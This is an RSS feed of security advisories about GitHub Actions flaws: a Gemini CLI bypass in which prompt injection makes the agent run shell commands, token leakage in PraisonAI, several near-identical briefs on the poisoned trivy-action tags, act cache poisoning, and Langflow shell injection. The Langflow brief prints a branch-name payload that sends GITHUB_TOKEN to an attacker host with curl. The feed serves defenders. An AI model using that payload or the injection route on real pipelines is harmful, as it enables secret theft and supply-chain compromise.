<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Github-Actions — CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/tags/github-actions/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata — refreshed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Fri, 24 Apr 2026 19:30:01 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/tags/github-actions/feed.xml" rel="self" type="application/rss+xml"/><item><title>Gemini CLI Remote Code Execution via Workspace Trust and Tool Allowlisting Bypasses</title><link>https://feed.craftedsignal.io/briefs/2026-04-gemini-cli-rce/</link><pubDate>Fri, 24 Apr 2026 19:30:01 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-gemini-cli-rce/</guid><description>Gemini CLI is vulnerable to remote code execution via workspace trust and tool allowlisting bypasses, impacting headless mode and GitHub Actions workflows.</description><content:encoded><![CDATA[<p>Gemini CLI (<code>@google/gemini-cli</code>) versions prior to 0.39.1 and version 0.40.0-preview.2, along with the <code>run-gemini-cli</code> GitHub Action versions prior to 0.1.22, are susceptible to remote code execution due to insecure workspace trust handling and tool allowlisting bypasses. The vulnerability arises from the automatic trust of workspace folders in headless mode, allowing malicious environment variables within the <code>.gemini/</code> directory to be exploited. Furthermore, in <code>--yolo</code> mode, the tool allowlist was previously ignored, enabling prompt injection and code execution via commands like <code>run_shell_command</code>. This poses a risk, especially in CI/CD environments that process untrusted inputs such as pull requests. The patched version 0.39.1 enforces explicit folder trust in headless mode and properly evaluates tool allowlists under <code>--yolo</code>, mitigating these risks. This impacts all Gemini CLI GitHub Actions and requires users to review their workflows.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker submits a malicious pull request to a repository using Gemini CLI in a GitHub Actions workflow.</li>
<li>The workflow, running in headless mode, automatically trusts the workspace folder (versions prior to 0.39.1).</li>
<li>The attacker&rsquo;s pull request includes a crafted <code>.gemini/</code> directory containing malicious environment variables.</li>
<li>Gemini CLI loads the malicious environment variables, leading to code execution.</li>
<li>Alternatively, the attacker injects a malicious prompt leveraging <code>run_shell_command</code> when <code>--yolo</code> is used.</li>
<li>The <code>run_shell_command</code> executes arbitrary commands on the runner due to the bypassed tool allowlist (versions prior to 0.39.1).</li>
<li>The attacker gains control of the CI/CD runner, potentially exfiltrating secrets or injecting malicious code into the deployment pipeline.</li>
<li>Successful exploitation leads to code execution on the CI/CD runner, data exfiltration, or supply chain compromise.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The vulnerability impacts workflows utilizing Gemini CLI in headless mode, particularly those processing untrusted inputs such as pull requests from external contributors. Successful exploitation can lead to remote code execution on the CI/CD runner, potentially enabling attackers to exfiltrate sensitive information, such as API keys and credentials, or inject malicious code into the application deployment pipeline. This can lead to a supply chain compromise. All Gemini CLI GitHub Actions are affected, requiring users to review and update their workflows.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade <code>@google/gemini-cli</code> to version 0.39.1 or later, or 0.40.0-preview.3 if using a preview version.</li>
<li>Upgrade <code>actions/google-github-actions/run-gemini-cli</code> to version 0.1.22 or later.</li>
<li>For workflows running on trusted inputs, set <code>GEMINI_TRUST_WORKSPACE: 'true'</code> in the GitHub Actions workflow.</li>
<li>For workflows processing untrusted inputs, review the hardening guidance in <a href="https://github.com/google-github-actions/run-gemini-cli">google-github-actions/run-gemini-cli</a> and set the environment variable accordingly.</li>
<li>Review and harden tool allowlists in <code>~/.gemini/settings.json</code> to restrict the commands that can be executed, especially when using the <code>--yolo</code> flag.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>rce</category><category>supply-chain</category><category>github-actions</category></item><item><title>PraisonAI GitHub Actions Credential Leakage Vulnerability (CVE-2026-40313)</title><link>https://feed.craftedsignal.io/briefs/2026-04-praisonai-artifact-leakage/</link><pubDate>Tue, 14 Apr 2026 04:17:13 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-praisonai-artifact-leakage/</guid><description>PraisonAI versions 4.5.139 and below are vulnerable to credential leakage due to the ArtiPACKED attack, where GitHub Actions workflows using actions/checkout without persist-credentials: false write the GITHUB_TOKEN into the .git/config file, leading to potential exposure in uploaded artifacts and subsequent supply chain compromise.</description><content:encoded><![CDATA[<p>PraisonAI, a multi-agent teams system, faces a critical vulnerability (CVE-2026-40313) in versions 4.5.139 and below. The vulnerability stems from the ArtiPACKED attack vector within GitHub Actions workflows. Specifically, the use of actions/checkout without setting <code>persist-credentials: false</code> causes the GITHUB_TOKEN to be written to the <code>.git/config</code> file. When subsequent workflow steps upload artifacts (build outputs, logs, test results, etc.), these tokens can be inadvertently included. Given that PraisonAI is a public repository, any user with read access can download these artifacts and extract the leaked tokens. Successful exploitation allows attackers to push malicious code, poison releases and PyPI/Docker packages, steal repository secrets, and ultimately compromise the entire supply chain, affecting all downstream users. The issue is present across multiple workflow and action files within the <code>.github/workflows/</code> and <code>.github/actions/</code> directories. Version 4.5.140 addresses and resolves this vulnerability.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains read access to the public PraisonAI GitHub repository.</li>
<li>Attacker identifies a GitHub Actions workflow that uploads artifacts.</li>
<li>The workflow uses <code>actions/checkout</code> without <code>persist-credentials: false</code>, causing the GITHUB_TOKEN to be written to <code>.git/config</code>.</li>
<li>The workflow uploads an artifact (e.g., build output, logs, test results) that includes the <code>.git/config</code> file.</li>
<li>Attacker downloads the artifact.</li>
<li>Attacker extracts the GITHUB_TOKEN from the <code>.git/config</code> file within the artifact.</li>
<li>Attacker uses the leaked GITHUB_TOKEN to authenticate to the PraisonAI repository.</li>
<li>Attacker leverages the compromised GITHUB_TOKEN to inject malicious code, poison releases/packages, steal secrets, or perform other malicious activities, leading to a supply chain compromise.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-40313 in PraisonAI versions 4.5.139 and below can result in a severe supply chain compromise. Attackers can inject malicious code into the PraisonAI repository, poison releases and associated packages (PyPI, Docker), and steal sensitive repository secrets. This can lead to widespread distribution of malware to downstream users of PraisonAI, compromising their systems and data. The vulnerability affects any user relying on PraisonAI and its distributed components.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade PraisonAI to version 4.5.140 or later to patch CVE-2026-40313.</li>
<li>Audit all GitHub Actions workflows in your organization to ensure that <code>actions/checkout</code> is used with <code>persist-credentials: false</code> to prevent credential leakage.</li>
<li>Monitor public repositories for inadvertently exposed configuration files containing credentials, and rotate potentially compromised tokens immediately.</li>
<li>Implement the Sigma rule &ldquo;Detect GitHub Workflow Artifact Containing Git Config&rdquo; to identify leaked git configurations.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>credential-leakage</category><category>supply-chain</category><category>github-actions</category><category>cve-2026-40313</category></item><item><title>Compromised trivy-action GitHub Action Leads to Credential Theft</title><link>https://feed.craftedsignal.io/briefs/2026-04-trivy-supply-chain/</link><pubDate>Tue, 31 Mar 2026 08:36:29 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-trivy-supply-chain/</guid><description>The trivy-action GitHub Action was compromised via git tag repointing, where 76 of 77 release tags were retroactively poisoned, leading to a multi-stage credential theft operation discovered following a spike in script execution detections on Linux runners.</description><content:encoded><![CDATA[<p>On March 19, 2026, CrowdStrike detected a spike in script execution on Linux-based GitHub Actions runners. Investigation traced the activity to a compromise of the aquasecurity/trivy-action GitHub Action, a widely used open-source vulnerability scanner in CI/CD pipelines. The compromise involved retroactively poisoning 76 of the scanner&rsquo;s 77 release tags through git tag repointing. This replaced the legitimate entry point with a multi-stage credential stealer. The malicious code ran before the actual scanner, making the compromise difficult to detect as workflows appeared to complete normally. Aqua Security confirmed the compromise of the Trivy GitHub Action script, setup script, and binary, and removed the malicious artifacts. This supply chain attack highlights the risk of relying on third-party actions in CI/CD pipelines without proper verification and monitoring.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>A developer pushes code, opens a pull request, or merges a branch in a repository using the compromised trivy-action.</li>
<li>The GitHub Actions runner executes the workflow, downloading the specified version of the trivy-action. Due to tag repointing, a malicious version of the action is downloaded instead of the legitimate one.</li>
<li>The malicious <code>entrypoint.sh</code> script is executed, which prepends approximately 105 lines of attack code before the original Trivy scanner logic.</li>
<li>The malicious script enumerates process IDs (PIDs) on the runner to identify potential targets.</li>
<li>The script executes a multi-stage credential theft operation, stealing secrets and credentials available within the runner environment.</li>
<li>The legitimate Trivy scanner is executed after the malicious code, masking the compromise as the workflow appears to complete successfully.</li>
<li>Stolen credentials are exfiltrated to a destination controlled by the attacker.</li>
<li>The attacker uses the stolen credentials to gain unauthorized access to internal infrastructure, cloud resources, or other sensitive systems.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>This supply chain compromise affected users of the aquasecurity/trivy-action GitHub Action. The retroactive poisoning of 76 release tags meant that any CI/CD pipeline using those versions of the action was potentially compromised. The impact included the potential theft of sensitive credentials, secrets, and API keys stored within the GitHub Actions runner environment. Successful credential theft could lead to unauthorized access to critical infrastructure, data breaches, and further downstream attacks. The number of affected organizations is unknown, but given the popularity of trivy-action, the scope could be significant.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Review your GitHub Actions workflows for usage of <code>aquasecurity/trivy-action</code> and verify the integrity of the action&rsquo;s code. Consider pinning to specific commit SHAs instead of tags to avoid tag repointing attacks.</li>
<li>Deploy the Sigma rule <code>Detect Suspicious Script Execution in GitHub Actions Runner</code> to identify potentially malicious script execution within GitHub Actions runner environments.</li>
<li>Monitor process execution on GitHub Actions runners for unusual or unexpected activity, particularly scripts running from temporary directories, to detect deviations from expected CI/CD behavior.</li>
<li>Implement strict access controls and credential management policies for GitHub Actions secrets and credentials to minimize the impact of potential credential theft.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>supply-chain</category><category>github-actions</category><category>credential-theft</category></item><item><title>Compromised trivy-action GitHub Action Leads to Credential Theft</title><link>https://feed.craftedsignal.io/briefs/2026-04-trivy-action-supply-chain/</link><pubDate>Tue, 31 Mar 2026 07:24:09 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-trivy-action-supply-chain/</guid><description>The aquasecurity/trivy-action GitHub Action was compromised via git tag repointing, injecting malicious code into the entrypoint.sh script to steal credentials from CI/CD pipelines before executing the legitimate Trivy scanner.</description><content:encoded><![CDATA[<p>On March 19, 2026, a spike in suspicious script executions on Linux GitHub Actions runners was observed across multiple CrowdStrike Falcon platform customers. The investigation traced the activity to a supply chain compromise within the widely-used aquasecurity/trivy-action GitHub Action, a popular open-source vulnerability scanner used in CI/CD pipelines. Attackers retroactively poisoned 76 out of 77 release tags by repointing them to malicious commits. This allowed them to inject a multi-stage credential stealer into the action&rsquo;s <code>entrypoint.sh</code> script. The malicious code executes before the legitimate scanner, making the compromise less noticeable. Aqua Security confirmed the compromise of the Trivy GitHub Action script, setup script, and binary and has removed the malicious artifacts. This incident highlights the risks associated with trusting third-party actions in CI/CD pipelines and the potential for attackers to exploit tag mutability in Git.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker gains unauthorized write access to the <code>aquasecurity/trivy-action</code> GitHub repository.</li>
<li>The attacker retroactively modifies existing Git tags (e.g., <code>0.24.0</code>) to point to a malicious commit.</li>
<li>The malicious commit injects approximately 105 lines of malicious code into the <code>entrypoint.sh</code> script, prepended before the legitimate Trivy scanner logic.</li>
<li>A GitHub Actions workflow includes a step using the compromised <code>aquasecurity/trivy-action</code> by referencing a poisoned tag (e.g., <code>- uses: aquasecurity/trivy-action@0.24.0</code>).</li>
<li>When the workflow runs on a GitHub Actions runner, the runner downloads the compromised action and executes the malicious <code>entrypoint.sh</code> script.</li>
<li>The malicious code in <code>entrypoint.sh</code> enumerates running processes to identify potential credential sources and exfiltrates sensitive data.</li>
<li>The legitimate Trivy scanner executes, masking the malicious activity.</li>
<li>The attacker gains access to stolen credentials, secrets, and API keys, potentially allowing them to compromise cloud infrastructure, internal systems, and source code repositories.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>This supply chain attack directly impacted organizations using the compromised <code>aquasecurity/trivy-action</code> GitHub Action in their CI/CD pipelines. The number of affected organizations is currently unknown, but given the action&rsquo;s popularity, it is likely significant. Successful exploitation allows attackers to steal sensitive credentials, including API keys, cloud credentials, and deploy tokens. This can lead to unauthorized access to internal infrastructure, data exfiltration, and further compromise of the software supply chain. The incident highlights the critical importance of verifying the integrity of third-party dependencies and implementing robust security measures in CI/CD environments.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Immediately audit your GitHub Actions workflows for usage of the <code>aquasecurity/trivy-action</code> and update to a safe version (as provided by Aqua Security) or remove the action entirely.</li>
<li>Implement integrity checks for third-party GitHub Actions by verifying the commit SHA instead of relying solely on tags to mitigate tag re-pointing attacks.</li>
<li>Monitor process execution on GitHub Actions runners for suspicious scripts, especially those running from within action directories, using process creation logs. An example detection rule is provided below.</li>
<li>Enable network connection logging on GitHub Actions runners to identify potential data exfiltration attempts originating from action scripts.</li>
<li>Review GitHub Actions logs for any anomalies or unexpected behavior that may indicate a compromise.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>supply-chain</category><category>github-actions</category><category>credential-theft</category></item><item><title>Compromised trivy-action GitHub Action Leads to Credential Theft</title><link>https://feed.craftedsignal.io/briefs/2026-04-trivy-action-compromise/</link><pubDate>Tue, 31 Mar 2026 06:07:07 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-trivy-action-compromise/</guid><description>The trivy-action GitHub Action, a widely used vulnerability scanner in CI/CD pipelines, was compromised via git tag repointing to inject a multi-stage credential stealer, affecting 76 of 77 release tags.</description><content:encoded><![CDATA[<p>On March 19, 2026, CrowdStrike detected a spike in suspicious script executions on Linux-based GitHub Actions runners, which led to the discovery of a supply chain compromise affecting the <code>aquasecurity/trivy-action</code> GitHub Action. This action is a popular open-source vulnerability scanner frequently used in CI/CD pipelines. The attacker retroactively poisoned 76 of the 77 release tags by repointing them to malicious commits. These commits replaced the legitimate entry point with a multi-stage credential stealer. The injected code executes before the original scanner, allowing workflows to complete seemingly normally while secretly exfiltrating sensitive information. Aqua Security has confirmed and removed the malicious artifacts. This incident highlights the risks associated with mutable tags in Git-based workflows and the importance of verifying action integrity.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains write access to the <code>aquasecurity/trivy-action</code> repository on GitHub.</li>
<li>The attacker modifies the action&rsquo;s <code>entrypoint.sh</code> script to include malicious code for credential theft. Specifically, the attacker prepends approximately 105 lines of malicious code.</li>
<li>The attacker uses git tag repointing to retroactively poison existing release tags (e.g., <code>@0.24.0</code>) to point to the malicious commit.</li>
<li>Developers&rsquo; CI/CD pipelines reference the compromised <code>trivy-action</code> using a poisoned tag (e.g., <code>aquasecurity/trivy-action@0.24.0</code>).</li>
<li>When a workflow runs, the GitHub Actions runner downloads and executes the malicious <code>entrypoint.sh</code> script, granting it access to the runner&rsquo;s environment, secrets, and network.</li>
<li>The malicious script enumerates running processes to identify potential targets for credential theft.</li>
<li>The malicious code exfiltrates credentials and secrets.</li>
<li>The original <code>trivy</code> scanner is executed, masking the malicious activity and allowing the workflow to complete normally.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The compromise of the <code>trivy-action</code> GitHub Action allowed attackers to steal credentials and secrets from CI/CD pipelines that used the compromised action. Because the malicious code ran with the full privileges of the runner, it had access to sensitive information such as API keys, deployment tokens, and cloud credentials. The number of affected organizations is unknown, but given the widespread adoption of <code>trivy-action</code>, the potential impact is significant. Successful exploitation can lead to unauthorized access to cloud resources, code repositories, and other sensitive systems.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Inspect your CI/CD pipeline configurations for usage of the <code>aquasecurity/trivy-action</code> and audit the integrity of the referenced tags against the known good commits, if available from Aqua Security&rsquo;s advisories.</li>
<li>Implement tooling and processes to verify the integrity of third-party GitHub Actions used in CI/CD pipelines.</li>
<li>Monitor process execution on GitHub Actions runners for suspicious activity, such as enumeration of processes or unexpected network connections (see Sigma rule below).</li>
<li>Enable and review process creation logs on CI/CD runner environments to identify anomalous script execution (see Sigma rule below).</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>supply-chain</category><category>github-actions</category><category>credential-theft</category><category>linux</category></item><item><title>act Project Cache Poisoning Vulnerability Leads to Potential RCE</title><link>https://feed.craftedsignal.io/briefs/2024-02-29-act-cache-rce/</link><pubDate>Tue, 31 Mar 2026 03:15:58 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-02-29-act-cache-rce/</guid><description>A vulnerability in versions prior to 0.2.86 of the act project allows remote attackers to create arbitrary caches, potentially leading to remote code execution within Docker containers by poisoning predicted cache keys.</description><content:encoded><![CDATA[<p>The <code>act</code> project, designed for local execution of GitHub Actions workflows, contains a critical vulnerability affecting versions prior to 0.2.86. The built-in actions/cache server, intended for local caching, inadvertently listens for connections on all network interfaces. This exposure allows any attacker capable of reaching the server, including those on the internet, to create caches with arbitrary keys and retrieve existing cache data. By predicting the cache keys used by local actions, an attacker can inject malicious content into the cache, paving the way for arbitrary remote code execution within the Docker container used by <code>act</code>. This vulnerability was addressed in version 0.2.86 of <code>act</code>. The CVSS v3.1 base score is 8.2, indicating a high severity threat.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a vulnerable <code>act</code> instance running a version prior to 0.2.86 with its cache server exposed on all interfaces.</li>
<li>The attacker probes the exposed <code>act</code> cache server to determine accessible endpoints and version information.</li>
<li>The attacker analyzes common GitHub Actions workflows and identifies predictable cache keys.</li>
<li>The attacker crafts a malicious cache archive containing payloads designed for remote code execution.</li>
<li>The attacker uploads the malicious cache archive to the vulnerable <code>act</code> instance using the predicted cache key.</li>
<li>A legitimate user triggers a local GitHub Actions workflow using <code>act</code>.</li>
<li>The <code>act</code> instance retrieves the attacker&rsquo;s malicious cache archive instead of the expected legitimate cache.</li>
<li>The malicious payload within the cache is executed within the Docker container, leading to remote code execution on the host system running <code>act</code>.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows an attacker to achieve arbitrary remote code execution on the host system running the vulnerable version of <code>act</code>. This can lead to complete system compromise, data theft, and further lateral movement within the network. The vulnerability affects any user running a version of <code>act</code> prior to 0.2.86 with the cache server exposed. While the number of directly affected users is unknown, the potential impact on development environments and CI/CD pipelines is significant.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade to version 0.2.86 or later of the <code>act</code> project to remediate the vulnerability (CVE-2026-34042).</li>
<li>Implement network access controls to restrict access to the <code>act</code> cache server to only trusted networks and hosts.</li>
<li>Monitor network connections to the <code>act</code> cache server for unexpected or unauthorized access.</li>
<li>Enable process monitoring on systems running <code>act</code> to detect potentially malicious processes spawned from Docker containers.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>act</category><category>cache-poisoning</category><category>rce</category><category>github-actions</category><category>linux</category></item><item><title>Compromised trivy-action GitHub Action Leads to Credential Theft</title><link>https://feed.craftedsignal.io/briefs/2026-03-trivy-action-supply-chain/</link><pubDate>Mon, 30 Mar 2026 06:24:43 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-trivy-action-supply-chain/</guid><description>The aquasecurity/trivy-action GitHub Action was compromised via git tag repointing, injecting a multi-stage credential stealer into CI/CD pipelines, allowing for the theft of secrets and credentials.</description><content:encoded><![CDATA[<p>On March 19, 2026, CrowdStrike&rsquo;s Engineering team discovered a supply chain compromise targeting the aquasecurity/trivy-action GitHub Action, a popular open-source vulnerability scanner used in CI/CD pipelines. The attackers retroactively poisoned 76 of the scanner’s 77 release tags using git tag repointing, replacing the original entry point with a multi-stage credential stealer. The malicious code operates before the legitimate scanner, masking its activity and allowing workflows to appear normal. This attack highlights the risks associated with mutable tags in Git and the potential for widespread compromise when relying on third-party actions within CI/CD environments. Defenders should implement strong integrity checks and consider using immutable references to mitigate such risks.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains write access to the aquasecurity/trivy-action repository.</li>
<li>The attacker uses git tag repointing to modify existing release tags (e.g., 0.24.0), replacing the legitimate entrypoint.sh script with a malicious version.</li>
<li>A developer&rsquo;s CI/CD pipeline includes a step that uses the compromised trivy-action by referencing a poisoned tag (e.g., uses: <a href="mailto:aquasecurity/trivy-action@0.24.0">aquasecurity/trivy-action@0.24.0</a>).</li>
<li>When the workflow runs on a GitHub Actions runner, the runner downloads the compromised action and executes the malicious entrypoint.sh script.</li>
<li>The malicious script enumerates running processes to identify potential credential sources.</li>
<li>The script steals credentials and secrets from the runner&rsquo;s environment, including API keys, deployment tokens, and cloud credentials.</li>
<li>After stealing credentials, the malicious script executes the legitimate Trivy scanner to avoid raising suspicion.</li>
<li>The stolen credentials are used to gain unauthorized access to internal infrastructure and resources.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The compromise of the trivy-action GitHub Action could impact a significant number of organizations relying on this popular scanner in their CI/CD pipelines. With 76 of 77 release tags poisoned, the potential scope of the attack is broad. Successful exploitation leads to the theft of sensitive credentials, enabling attackers to access internal infrastructure, deploy malicious code, or exfiltrate sensitive data. The silent nature of the attack, with the legitimate scanner still running, makes detection challenging and increases the dwell time of the attacker.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Enable process monitoring on GitHub Actions runners to detect suspicious script execution and unusual process trees (reference: Attack Chain).</li>
<li>Implement integrity checks for third-party actions used in CI/CD pipelines to verify their authenticity and prevent tampering (reference: Overview).</li>
<li>Consider using immutable references (e.g., commit SHAs instead of tags) for GitHub Actions to prevent tag repointing attacks (reference: Overview).</li>
<li>Deploy the Sigma rule below to detect suspicious bash scripts executing in the context of GitHub Action runners (reference: rules).</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>supply-chain</category><category>credential-theft</category><category>github-actions</category></item><item><title>Compromised trivy-action GitHub Action Enables Credential Theft</title><link>https://feed.craftedsignal.io/briefs/2026-03-trivy-action-compromise/</link><pubDate>Sat, 28 Mar 2026 08:12:22 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-trivy-action-compromise/</guid><description>The trivy-action GitHub Action was compromised via git tag repointing, with attackers poisoning 76 of 77 release tags to inject a multi-stage credential stealer before the legitimate scanner runs, granting attackers access to CI/CD pipeline secrets.</description><content:encoded><![CDATA[<p>On March 19, 2026, a spike in script execution detections on Linux-based GitHub Actions runners led to the discovery of a supply chain compromise affecting the aquasecurity/trivy-action GitHub Action. The attackers retroactively poisoned 76 of the 77 release tags by repointing them to malicious commits. This manipulation replaced the legitimate entry point with a multi-stage credential stealer. The malicious code operates silently before the legitimate Trivy scanner logic is executed, which allows the malicious activity to remain hidden as workflows appear to complete normally. Aqua Security has confirmed the compromise and removed the malicious artifacts. This incident highlights the risks associated with trusting third-party actions in CI/CD pipelines and the potential for attackers to gain access to sensitive credentials and internal infrastructure.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>A developer triggers a GitHub Actions workflow that utilizes the <code>aquasecurity/trivy-action</code>.</li>
<li>The GitHub Actions runner downloads the specified version of the <code>trivy-action</code> from GitHub.</li>
<li>Due to tag repointing, the downloaded action contains malicious code in the <code>entrypoint.sh</code> script.</li>
<li>The malicious <code>entrypoint.sh</code> script executes a multi-stage credential theft operation.</li>
<li>The script enumerates process IDs (PIDs) to discover runner processes.</li>
<li>After credential theft, the legitimate Trivy scanner logic is executed to maintain the appearance of normal operation.</li>
<li>Stolen credentials and secrets are likely exfiltrated to a attacker controlled server.</li>
<li>The attacker uses the stolen credentials to gain unauthorized access to internal infrastructure, cloud resources, or other sensitive systems.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The compromise of the trivy-action GitHub Action could have resulted in widespread credential theft across numerous organizations using the affected versions. With 76 of 77 release tags poisoned, a vast majority of users were exposed. Successful credential theft can lead to unauthorized access to sensitive systems, data breaches, and potential supply chain attacks affecting downstream customers. The incident highlights the critical importance of supply chain security and the need for robust monitoring and detection mechanisms in CI/CD pipelines.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Inspect your CI/CD pipelines for usage of the <code>aquasecurity/trivy-action</code> GitHub Action and verify the integrity of the action being used.</li>
<li>Implement the Sigma rule <code>Detect Suspicious Script Execution in GitHub Actions Runner</code> to identify potentially malicious script execution within GitHub Actions runners.</li>
<li>Monitor process execution within GitHub Actions runners for unusual or unexpected activity that deviates from normal CI/CD operations (reference: Attack Chain step 5).</li>
<li>Enable detailed logging on GitHub Actions runners to capture process execution, network connections, and file system activity for forensic analysis and threat hunting.</li>
<li>Implement strong access controls and least privilege principles for GitHub Actions secrets and credentials to limit the impact of potential credential theft.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>supply-chain</category><category>credential-theft</category><category>github-actions</category></item><item><title>Langflow GitHub Actions Shell Injection Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-03-langflow-shell-injection/</link><pubDate>Wed, 25 Mar 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-langflow-shell-injection/</guid><description>Unauthenticated remote shell injection vulnerability exists in Langflow GitHub Actions workflows prior to version 1.9.0, enabling attackers to execute arbitrary shell commands via malicious branch names or pull request titles due to unsanitized GitHub context variable interpolation, leading to potential secret exfiltration and supply chain compromise.</description><content:encoded><![CDATA[<p>Langflow, a tool for building and deploying AI-powered agents and workflows, is vulnerable to a critical shell injection flaw in its GitHub Actions workflows. Discovered in versions prior to 1.9.0 and assigned CVE-2026-33475, the vulnerability stems from unsanitized interpolation of GitHub context variables (e.g., <code>${{ github.head_ref }}</code>) within the <code>run:</code> steps of various workflow files. By crafting malicious branch names or pull request titles, attackers can inject and execute arbitrary shell commands during CI/CD pipeline execution. Successful exploitation allows for the exfiltration of sensitive CI/CD secrets like <code>GITHUB_TOKEN</code>, manipulation of infrastructure, and potential compromise of the software supply chain. The vulnerability was patched in version 1.9.0. This poses a significant risk to any public Langflow fork with GitHub Actions enabled.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker forks the Langflow repository on GitHub.</li>
<li>The attacker creates a new branch with a specially crafted name containing a shell injection payload, such as <code>injection-test &amp;&amp; curl https://attacker.site/exfil?token=$GITHUB_TOKEN</code>.</li>
<li>The attacker submits a pull request from the malicious branch to the main branch of the forked repository.</li>
<li>GitHub Actions is triggered to run the affected workflow (e.g., <code>deploy-docs-draft.yml</code>).</li>
<li>Within the workflow, the <code>run:</code> step attempts to use the unsanitized branch name via <code>${{ github.head_ref }}</code>.</li>
<li>The injected shell command executes, sending the <code>GITHUB_TOKEN</code> to an attacker-controlled server.</li>
<li>The attacker receives the <code>GITHUB_TOKEN</code> and can now authenticate to the GitHub API with the privileges of the affected workflow.</li>
<li>The attacker leverages the compromised <code>GITHUB_TOKEN</code> to push malicious code, create new releases, or tamper with other aspects of the software supply chain.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>This vulnerability allows for arbitrary code execution within the GitHub Actions CI/CD environment. A successful attack grants full access to CI secrets, potentially leading to the exfiltration of the <code>GITHUB_TOKEN</code>. The attacker can then push malicious tags or container images, tamper with releases, or leak sensitive infrastructure data.  Given the nature of CI/CD pipelines, a compromise could have far-reaching effects on any project that depends on the affected Langflow repository or its forks. The number of potential victims is directly proportional to the number of Langflow forks with enabled GitHub Actions.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade to Langflow version 1.9.0 or later to patch CVE-2026-33475.</li>
<li>Examine GitHub Actions workflows for direct interpolation of GitHub context variables in <code>run:</code> steps, particularly those involving user-controlled values like branch names and pull request titles (e.g., in <code>.github/workflows/deploy-docs-draft.yml</code>).</li>
<li>Implement proper sanitization or quoting of untrusted inputs before using them in shell commands within GitHub Actions workflows.</li>
<li>Adopt the suggested fix of using environment variables and wrapping them in double quotes when referencing GitHub context variables within <code>run:</code> steps (as described in the overview).</li>
<li>Deploy the Sigma rule <code>Detect Github Actions Shell Injection via Branch Name</code> to identify potentially malicious branch names used in pull requests.</li>
</ul>
